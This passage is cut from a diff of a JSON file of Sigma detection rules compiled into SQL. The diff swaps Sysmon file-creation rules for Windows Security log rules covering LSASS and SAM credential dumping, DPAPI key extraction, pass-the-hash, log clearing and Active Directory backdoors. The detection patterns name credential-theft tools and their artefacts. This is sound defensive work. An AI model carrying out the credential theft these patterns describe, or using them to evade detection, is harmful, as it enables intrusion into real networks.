'%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND 
PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 
'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - 
"filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "Security Event Log Cleared", + "id": "a122ac13-daf8-4175-83a2-72c387be339d", + "status": "test", + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "author": "Saw Winn Naung", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1070.001" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE 
'%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_event_log_cleared.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a 
suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", - "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "title": "User Added to Local Administrators", + "id": 
"c265cf08-3f99-46c1-8d59-328247057d57", + "status": "stable", + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1546.013" + "attack.t1078", + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_user_added_to_local_administrators.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack 
scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Files that accidentally contain these strings" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1187" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", - "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", - "status": "experimental", - "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "status": "test", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Unknown" + "Runas command-line tool using /netonly parameter" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' 
AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Suspicious Screensaver Binary File Creation", - "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", - "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "title": "SCM Database Privileged Operation", + "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "status": "test", + "description": "Detects non-system users performing privileged operation os the SCM database", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.002" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_scr_binary_file.yml" + "filename": "win_security_scm_database_privileged_operation.yml" }, { - "title": "Wmiexec Default Output File", - "id": 
"8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. 
(See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA 
secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local 
Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" - ], - "falsepositives": [ - "Rare cases of administrative activity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" + "attack.t1003.006" ], - "filename": "file_event_win_sam_dump.yml" - }, - { - "title": "ISO or Image Mount Indicator in Recent Files", - "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", - "status": "test", - "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Cases in which a user mounts an image file for legitimate reasons" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' 
